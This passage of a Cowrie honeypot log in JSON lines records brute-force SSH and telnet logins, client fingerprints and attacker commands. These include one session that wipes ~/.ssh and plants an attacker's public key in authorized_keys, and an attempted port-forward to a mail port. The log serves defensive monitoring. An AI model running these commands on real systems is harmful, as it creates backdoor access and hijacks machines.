12","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:05:52.866975Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36570,"dst_ip":"1.2.3.4","dst_port":23,"session":"b30facade1f9","protocol":"telnet","message":"New connection: 212.227.125.160:36570 (1.2.3.4:23) [session: b30facade1f9]","sensor":"my-vps","timestamp":"2025-08-31T08:05:57.172930Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Zap.","message":"login attempt [root/Zap.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:05:58.205806Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:06:01.971743Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T08:06:01.972438Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:03.026135Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:03.027571Z","src_ip":"212.227.125.160","session":"21ec50eb2f65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46344,"dst_ip":"1.2.3.4","dst_port":22,"session":"9387b975c535","protocol":"ssh","message":"New connection: 212.227.235.229:46344 (1.2.3.4:22) [session: 9387b975c535]","sensor":"my-vps","timestamp":"2025-08-31T08:06:08.274888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:06:08.373775Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:06:08.545704Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.session.closed","duration":12.568809509277344,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:09.741560Z","src_ip":"212.227.125.160","session":"b30facade1f9"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":40756,"dst_ip":"1.2.3.4","dst_port":22,"session":"c610d8db4574","protocol":"ssh","message":"New connection: 201.148.180.50:40756 (1.2.3.4:22) [session: c610d8db4574]","sensor":"my-vps","timestamp":"2025-08-31T08:06:10.102983Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:06:10.946085Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:06:10.946764Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.login.success","username":"root","password":"notes","message":"login attempt [root/notes] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:06:15.201008Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.login.success","username":"root","password":"Zap.","message":"login attempt [root/Zap.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:06:16.275890Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:06:18.591182Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:06:18.591959Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:06:18.593137Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:06:19.189583Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T08:06:19.190294Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:19.446211Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:20.460291Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:20.461509Z","src_ip":"201.148.180.50","session":"c610d8db4574"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:06:22.910789Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T08:06:22.911508Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T08:06:23.172763Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:23.173614Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51779,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0704cdcdeda","protocol":"ssh","message":"New connection: 212.227.235.229:51779 (1.2.3.4:22) [session: b0704cdcdeda]","sensor":"my-vps","timestamp":"2025-08-31T08:06:24.467617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:06:24.709833Z","src_ip":"212.227.235.229","session":"b0704cdcdeda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:06:24.874290Z","src_ip":"212.227.235.229","session":"b0704cdcdeda"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T08:06:30.430379Z","src_ip":"212.227.235.229","session":"b0704cdcdeda"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:31.782417Z","src_ip":"212.227.235.229","session":"b0704cdcdeda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54252,"dst_ip":"1.2.3.4","dst_port":22,"session":"378c8fe23bbb","protocol":"ssh","message":"New connection: 212.227.235.229:54252 (1.2.3.4:22) [session: 378c8fe23bbb]","sensor":"my-vps","timestamp":"2025-08-31T08:06:31.946413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:06:32.074014Z","src_ip":"212.227.235.229","session":"378c8fe23bbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:06:32.237396Z","src_ip":"212.227.235.229","session":"378c8fe23bbb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:06:40.301389Z","src_ip":"212.227.235.229","session":"378c8fe23bbb"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:40.832918Z","src_ip":"212.227.235.229","session":"378c8fe23bbb"}
{"eventid":"cowrie.session.closed","duration":"32.6","message":"Connection lost after 32.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:06:40.834092Z","src_ip":"212.227.235.229","session":"9387b975c535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37094,"dst_ip":"1.2.3.4","dst_port":23,"session":"0763853b47e7","protocol":"telnet","message":"New connection: 212.227.125.160:37094 (1.2.3.4:23) [session: 0763853b47e7]","sensor":"my-vps","timestamp":"2025-08-31T08:06:58.379874Z"}
{"eventid":"cowrie.session.closed","duration":12.574722051620483,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:07:10.954526Z","src_ip":"212.227.125.160","session":"0763853b47e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37404,"dst_ip":"1.2.3.4","dst_port":23,"session":"09346f3201d9","protocol":"telnet","message":"New connection: 212.227.125.160:37404 (1.2.3.4:23) [session: 09346f3201d9]","sensor":"my-vps","timestamp":"2025-08-31T08:07:11.135644Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":43740,"dst_ip":"1.2.3.4","dst_port":23,"session":"2af22fdd40a2","protocol":"telnet","message":"New connection: 176.65.148.28:43740 (1.2.3.4:23) [session: 2af22fdd40a2]","sensor":"my-vps","timestamp":"2025-08-31T08:07:14.746468Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:07:14.785396Z","src_ip":"176.65.148.28","session":"2af22fdd40a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:07:14.805212Z","src_ip":"176.65.148.28","session":"2af22fdd40a2"}
{"eventid":"cowrie.session.closed","duration":12.800650119781494,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:07:23.936227Z","src_ip":"212.227.125.160","session":"09346f3201d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37740,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ae3dee4c856","protocol":"telnet","message":"New connection: 212.227.125.160:37740 (1.2.3.4:23) [session: 7ae3dee4c856]","sensor":"my-vps","timestamp":"2025-08-31T08:07:24.130625Z"}
{"eventid":"cowrie.session.closed","duration":12.804262161254883,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:07:36.934793Z","src_ip":"212.227.125.160","session":"7ae3dee4c856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38079,"dst_ip":"1.2.3.4","dst_port":23,"session":"64585f7e9942","protocol":"telnet","message":"New connection: 212.227.125.160:38079 (1.2.3.4:23) [session: 64585f7e9942]","sensor":"my-vps","timestamp":"2025-08-31T08:07:37.138736Z"}
{"eventid":"cowrie.session.closed","duration":12.824817657470703,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:07:49.963437Z","src_ip":"212.227.125.160","session":"64585f7e9942"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38388,"dst_ip":"1.2.3.4","dst_port":23,"session":"38f4e0da6a9f","protocol":"telnet","message":"New connection: 212.227.125.160:38388 (1.2.3.4:23) [session: 38f4e0da6a9f]","sensor":"my-vps","timestamp":"2025-08-31T08:07:50.134992Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:02.086770Z","src_ip":"79.124.8.120","session":"fd9301942aed"}
{"eventid":"cowrie.session.closed","duration":180.07993388175964,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:02.092706Z","src_ip":"79.124.8.120","session":"fd9301942aed"}
{"eventid":"cowrie.session.closed","duration":12.794115781784058,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:02.929046Z","src_ip":"212.227.125.160","session":"38f4e0da6a9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38698,"dst_ip":"1.2.3.4","dst_port":23,"session":"7bf75ecc066b","protocol":"telnet","message":"New connection: 212.227.125.160:38698 (1.2.3.4:23) [session: 7bf75ecc066b]","sensor":"my-vps","timestamp":"2025-08-31T08:08:03.129492Z"}
{"eventid":"cowrie.session.closed","duration":12.795328140258789,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:15.924749Z","src_ip":"212.227.125.160","session":"7bf75ecc066b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38992,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7faa1b68d53","protocol":"telnet","message":"New connection: 212.227.125.160:38992 (1.2.3.4:23) [session: d7faa1b68d53]","sensor":"my-vps","timestamp":"2025-08-31T08:08:16.129536Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27716,"dst_ip":"1.2.3.4","dst_port":22,"session":"7402129fff6e","protocol":"ssh","message":"New connection: 212.227.125.160:27716 (1.2.3.4:22) [session: 7402129fff6e]","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.251451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.252537Z","src_ip":"212.227.125.160","session":"7402129fff6e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.334747Z","src_ip":"212.227.125.160","session":"7402129fff6e"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.755476Z","src_ip":"212.227.125.160","session":"7402129fff6e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.836991Z","session":"7402129fff6e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T08:08:23.918192Z","src_ip":"212.227.125.160","session":"7402129fff6e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:24.000230Z","src_ip":"212.227.125.160","session":"7402129fff6e"}
{"eventid":"cowrie.session.closed","duration":12.794751167297363,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:28.924217Z","src_ip":"212.227.125.160","session":"d7faa1b68d53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39292,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe1d773127b9","protocol":"telnet","message":"New connection: 212.227.125.160:39292 (1.2.3.4:23) [session: fe1d773127b9]","sensor":"my-vps","timestamp":"2025-08-31T08:08:29.129514Z"}
{"eventid":"cowrie.session.closed","duration":12.802284955978394,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:41.931732Z","src_ip":"212.227.125.160","session":"fe1d773127b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39600,"dst_ip":"1.2.3.4","dst_port":23,"session":"1031bff5c2b9","protocol":"telnet","message":"New connection: 212.227.125.160:39600 (1.2.3.4:23) [session: 1031bff5c2b9]","sensor":"my-vps","timestamp":"2025-08-31T08:08:42.154638Z"}
{"eventid":"cowrie.session.closed","duration":12.799909591674805,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:08:54.954481Z","src_ip":"212.227.125.160","session":"1031bff5c2b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39911,"dst_ip":"1.2.3.4","dst_port":23,"session":"9df1dd8c6807","protocol":"telnet","message":"New connection: 212.227.125.160:39911 (1.2.3.4:23) [session: 9df1dd8c6807]","sensor":"my-vps","timestamp":"2025-08-31T08:08:55.172837Z"}
{"eventid":"cowrie.session.closed","duration":12.74159288406372,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:09:07.914351Z","src_ip":"212.227.125.160","session":"9df1dd8c6807"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40230,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c12dfb9e6f8","protocol":"telnet","message":"New connection: 212.227.125.160:40230 (1.2.3.4:23) [session: 6c12dfb9e6f8]","sensor":"my-vps","timestamp":"2025-08-31T08:09:08.134408Z"}
